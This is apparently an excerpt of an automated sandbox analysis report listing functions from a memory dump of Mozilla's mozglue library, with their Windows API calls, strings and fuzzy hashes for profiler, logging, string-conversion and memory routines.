Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: e0e9616844a6e4ec19671cbb8be2616767850896d14cfdd57b802a1c90a3ca0f
Instruction ID: 3a47fadbb9cfafbd32d20bcf4be846b476f661602e6d09d912e80ed40f90d189
Opcode Fuzzy Hash: e0e9616844a6e4ec19671cbb8be2616767850896d14cfdd57b802a1c90a3ca0f
Instruction Fuzzy Hash: 82C1A131A097449FDB05CF28C44466AB7F1FFCA714F058A2DECD5A76A0D730A889CB82

Function 6C2AEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C274A68), ref: 6C2A945E
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2A9470
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2A9482
Part of subcall function 6C2A9420: __Init_thread_footer.LIBCMT ref: 6C2A949F

GetCurrentThreadId.KERNEL32 ref: 6C2AEC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2AEC8C

Part of subcall function 6C2A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2A94EE
Part of subcall function 6C2A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2A9508

GetCurrentThreadId.KERNEL32 ref: 6C2AECA1
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C2AECC5
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C2AED19
CloseHandle.KERNEL32(?), ref: 6C2AED28
free.MOZGLUE(00000000), ref: 6C2AED2F
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C2AEC94

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: fe353a41172ebadb515efbe0ae1816489e8d61771c9c1586911ca5295a8eb69f
Instruction ID: b00358cb8505734a7e29e9941fc1f043883c271065e57aea6b216c5d13f2264d
Opcode Fuzzy Hash: fe353a41172ebadb515efbe0ae1816489e8d61771c9c1586911ca5295a8eb69f
Instruction Fuzzy Hash: 4A21D67960020DABDB019FA4E80CA9A7779EB4E36DF144210FD1467781D7719827CBA5

Function 6C2C5FF0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C2C6009
??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C2C6024
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(Q&l,?), ref: 6C2C6046
OutputDebugStringA.KERNEL32(?,Q&l,?), ref: 6C2C6061
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C2C6069
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C2C6073
_dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C2C6082
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C2E148E), ref: 6C2C6091
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,Q&l,00000000,?), ref: 6C2C60BA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C2C60C4

Strings

Q&l, xrefs: 6C2C5FFC, 6C2C6042, 6C2C6045, 6C2C60B3

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
String ID: Q&l
API String ID: 3835517998-3554260775
Opcode ID: 1b92b86aff2cc7f3e0ea352a3ebe34992d35160da226ae634941b2043dc80db0
Instruction ID: ead617d60c006182ccf6fdf2f7250f5ed3fcf6986959ea39c113cbe4dc80b9b9
Opcode Fuzzy Hash: 1b92b86aff2cc7f3e0ea352a3ebe34992d35160da226ae634941b2043dc80db0
Instruction Fuzzy Hash: 4221D671A0031C9BDB505F25DC4DAAA7BB8FF49615F008428FC5AA7281CB75A548CFD6

Function 6C2A8ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C26EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C26EB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C2AB392,?,?,00000001), ref: 6C2A91F4

Part of subcall function 6C29CBE8: GetCurrentProcess.KERNEL32(?,6C2631A7), ref: 6C29CBF1
Part of subcall function 6C29CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2631A7), ref: 6C29CBFA

Strings

stack-chart, xrefs: 6C2A90B2
name, xrefs: 6C2A8F16
timeline-fileio, xrefs: 6C2A90A4
timeline-overview, xrefs: 6C2A907A
marker-table, xrefs: 6C2A906C
marker-chart, xrefs: 6C2A905E
timeline-memory, xrefs: 6C2A9088
data, xrefs: 6C2A90E8
timeline-ipc, xrefs: 6C2A9096

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: b594d9d05c7e652fd91814da38d63d3647156cc18e0b24d00ee9dee9e8f090ed
Instruction ID: 9b017528a9fb35fd4756eda8d32338e0181123934f9900c5e3e2ff02cd2e21ea
Opcode Fuzzy Hash: b594d9d05c7e652fd91814da38d63d3647156cc18e0b24d00ee9dee9e8f090ed
Instruction Fuzzy Hash: 3EB1B6B1A0020E9BDB04DF99C895BEEBBB5BF44304F504019DD05ABF80DB72A956CBE1

Function 6C28C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C28C5A3
WideCharToMultiByte.KERNEL32 ref: 6C28C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C28C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C28CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C28CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C28CAA5

Strings

0, xrefs: 6C28D30A
(null), xrefs: 6C28C596

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: c7a8b4f48c63669db4ccd2316d3805bff4a06b33066976de32ad9702565ede4f
Instruction ID: d6de6c9f20e36f798a25dec945ea95b81c021724268f6fb953e274505b23d5d2
Opcode Fuzzy Hash: c7a8b4f48c63669db4ccd2316d3805bff4a06b33066976de32ad9702565ede4f
Instruction Fuzzy Hash: DDA1A23060A3469FDB00DF28C588B5ABBF1AF89B59F04892DFD9997781D731D809CB52

Function 6C2648E0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,6C2A483A,?), ref: 6C264ACB
memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C2A483A,?), ref: 6C264AE0
moz_xmalloc.MOZGLUE(?,?,6C2A483A,?), ref: 6C264A82

Part of subcall function 6C27CA10: mozalloc_abort.MOZGLUE(?), ref: 6C27CAA2

memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C2A483A,?), ref: 6C264A97
moz_xmalloc.MOZGLUE(?,?,6C2A483A,?), ref: 6C264A35

Part of subcall function 6C27CA10: malloc.MOZGLUE(?), ref: 6C27CA26

memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C2A483A,?), ref: 6C264A4A
moz_xmalloc.MOZGLUE(?,?,6C2A483A,?), ref: 6C264AF4
moz_xmalloc.MOZGLUE(?,?,6C2A483A,?), ref: 6C264B10
moz_xmalloc.MOZGLUE(?,?,6C2A483A,?), ref: 6C264B2C

Strings

:H*l, xrefs: 6C2648EB, 6C2649FB

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID: :H*l
API String ID: 4251373892-3946117882
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: 8ff2377f3a92480404f50524fd165cb9be8db06333cdf93314ddd6b7efd7918c
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: 1B717AB190170A9FCB54CF69C490AAAB7F5FF09308B10463ED95ACBB40E731E995CB90

Function 6C28C769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C28C784
_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C28C801
_dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C28C83D
?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C28C891

Strings

nan, xrefs: 6C28C7A8
inf, xrefs: 6C28C78F
INF, xrefs: 6C28C794
NAN, xrefs: 6C28C7AD

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
String ID: INF$NAN$inf$nan
API String ID: 1991403756-4166689840
Opcode ID: 0ba9327b02779856dbe3787020486ffe521dc493e9ea9e56fe9de09312448255
Instruction ID: 05206b15296e474286220eb775c9be315d780ef2ca0653bcf4db2a6beef9e3cd
Opcode Fuzzy Hash: 0ba9327b02779856dbe3787020486ffe521dc493e9ea9e56fe9de09312448255
Instruction Fuzzy Hash: B751A1309097498BD700AF2CC48169AFBF0BF8A705F408A2DFDD5A7691E770D989CB42

Function 6C263480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C263284,?,?,6C2856F6), ref: 6C263492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C263284,?,?,6C2856F6), ref: 6C2634A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C263284,?,?,6C2856F6), ref: 6C2634EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C26350E
__Init_thread_footer.LIBCMT ref: 6C263522
__aulldiv.LIBCMT ref: 6C263552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C263284,?,?,6C2856F6), ref: 6C26357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C263284,?,?,6C2856F6), ref: 6C263592

Part of subcall function 6C29AB89: EnterCriticalSection.KERNEL32(6C2EE370,?,?,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284), ref: 6C29AB94
Part of subcall function 6C29AB89: LeaveCriticalSection.KERNEL32(6C2EE370,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284,?,?,6C2856F6), ref: 6C29ABD1

Strings

kernel32.dll, xrefs: 6C2634EA
GetSystemTimePreciseAsFileTime, xrefs: 6C263508

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 3968b524243e6a9db6fe93f60a1f4af172d4cfbb69b35e1b4b441a51b96867cd
Instruction ID: 6a0ab6d2c62821e2ab269d40b5f900acc0078d8d56ff105a029bd28d8c8864ed
Opcode Fuzzy Hash: 3968b524243e6a9db6fe93f60a1f4af172d4cfbb69b35e1b4b441a51b96867cd
Instruction Fuzzy Hash: C9319071B0020A9BDF40DFBAD84CEAA77B5FB4E305F54401AED11B3AA0DA309944CB60

Function 6C264480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C2A4843,?), ref: 6C2645F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C2A4843,?), ref: 6C26468A
free.MOZGLUE(?,?,?,?,?,?,6C2A4843,?), ref: 6C2646C9
free.MOZGLUE(?), ref: 6C2646EF
free.MOZGLUE(?), ref: 6C264712
free.MOZGLUE(?), ref: 6C264735
free.MOZGLUE(?), ref: 6C264758
free.MOZGLUE(?), ref: 6C26477B
free.MOZGLUE(?), ref: 6C26479E

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: fb39510aa31e030cfa244b2cd13db6c53f56e05738ef96786e96006dcb199569
Instruction ID: c3cb690632cb0ab7fef68908284830ac6d527f202311ad26c860fd304462f105
Opcode Fuzzy Hash: fb39510aa31e030cfa244b2cd13db6c53f56e05738ef96786e96006dcb199569
Instruction Fuzzy Hash: 22B1E671A001198FDB18DE3DDCB076D76A6AF42318F184639EC96DBFD6D73098848BA1

Function 6C2CAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C2CAC52
CreateFileMappingW.KERNEL32 ref: 6C2CAC7D
GetSystemInfo.KERNEL32 ref: 6C2CAC98
MapViewOfFile.KERNEL32 ref: 6C2CACB0
GetSystemInfo.KERNEL32 ref: 6C2CACCD
MapViewOfFile.KERNEL32 ref: 6C2CAD05
UnmapViewOfFile.KERNEL32 ref: 6C2CAD1C
CloseHandle.KERNEL32 ref: 6C2CAD28
UnmapViewOfFile.KERNEL32 ref: 6C2CAD37
CloseHandle.KERNEL32 ref: 6C2CAD43
CloseHandle.KERNEL32 ref: 6C2CAD67

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 282240dd13e1702b8645aa67d33bd524397d8531997e93c5ab64bb991050a0e1
Instruction ID: b3e19a136b4e5114a2294f305ee29a398e6d34c9773cb7828cbc0d206cb968e9
Opcode Fuzzy Hash: 282240dd13e1702b8645aa67d33bd524397d8531997e93c5ab64bb991050a0e1
Instruction Fuzzy Hash: A5313DB1A04749CFDB40AF78D64C66EBBF0BF89305F054A2DED8997251EB709448CB92

Function 6C279620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C279675
__Init_thread_footer.LIBCMT ref: 6C279697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C2796E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C279707
__Init_thread_footer.LIBCMT ref: 6C27971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C279773

Part of subcall function 6C29AB89: EnterCriticalSection.KERNEL32(6C2EE370,?,?,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284), ref: 6C29AB94
Part of subcall function 6C29AB89: LeaveCriticalSection.KERNEL32(6C2EE370,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284,?,?,6C2856F6), ref: 6C29ABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C2797B7
FreeLibrary.KERNEL32 ref: 6C2797D0
FreeLibrary.KERNEL32 ref: 6C2797EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C279824

Strings

NtMapViewOfSection, xrefs: 6C279701
MapViewOfFileNuma2, xrefs: 6C2797B1
ntdll.dll, xrefs: 6C2796E3
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C279670

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: e98baab46612c310dacecb05077eafa6ec61424a9603e40bdfc00e77a346f82e
Instruction ID: 1e23549f1bbd24c5bed9046546e8efeea36ec3ff9fdbb5e7040fa528d70a1009
Opcode Fuzzy Hash: e98baab46612c310dacecb05077eafa6ec61424a9603e40bdfc00e77a346f82e
Instruction Fuzzy Hash: 9C41ADB4A0030A9BDF50DFA6E8C9A9777B4EB4E325F404528FD15A7B84D730A914CBB1

Function 6C2B0000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C274A68), ref: 6C2A945E
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2A9470
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2A9482
Part of subcall function 6C2A9420: __Init_thread_footer.LIBCMT ref: 6C2A949F

GetCurrentThreadId.KERNEL32 ref: 6C2B0039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2B0041
GetCurrentThreadId.KERNEL32 ref: 6C2B0075
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2B0082
moz_xmalloc.MOZGLUE(00000048), ref: 6C2B0090
free.MOZGLUE(?), ref: 6C2B0104
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2B011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C2B005B

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 3012294017-637075127
Opcode ID: 550e9970771f527ae3961fdc53fb31e020533d87acfa1f7a3b3a6084755a8684
Instruction ID: a001f2a576ac9dc08d1e51cd1f69ddb7d016ba87bac679998ec2882fd496aed8
Opcode Fuzzy Hash: 550e9970771f527ae3961fdc53fb31e020533d87acfa1f7a3b3a6084755a8684
Instruction Fuzzy Hash: 3E41AEB65003489FCB51CF69D844A9BBBF0FF4A358F40492DED5AA3B80DB31A805CB95

Function 6C277E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C277EA7
malloc.MOZGLUE(00000001), ref: 6C277EB3

Part of subcall function 6C27CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C27CB49
Part of subcall function 6C27CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C27CBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C277EC4
mozalloc_abort.MOZGLUE(?), ref: 6C277F19
malloc.MOZGLUE(?), ref: 6C277F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C277F4D

Strings

d, xrefs: 6C277F89

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: 75bf63e816e14b1eae0502cdf8512b608f5d8b79dbf3dc0d2d74aba302e06b2b
Instruction ID: 0ad2ac7bfe886f5446fe3e8cbe1130a26ffe57e1e5a67b58846c1ab59ff7580c
Opcode Fuzzy Hash: 75bf63e816e14b1eae0502cdf8512b608f5d8b79dbf3dc0d2d74aba302e06b2b
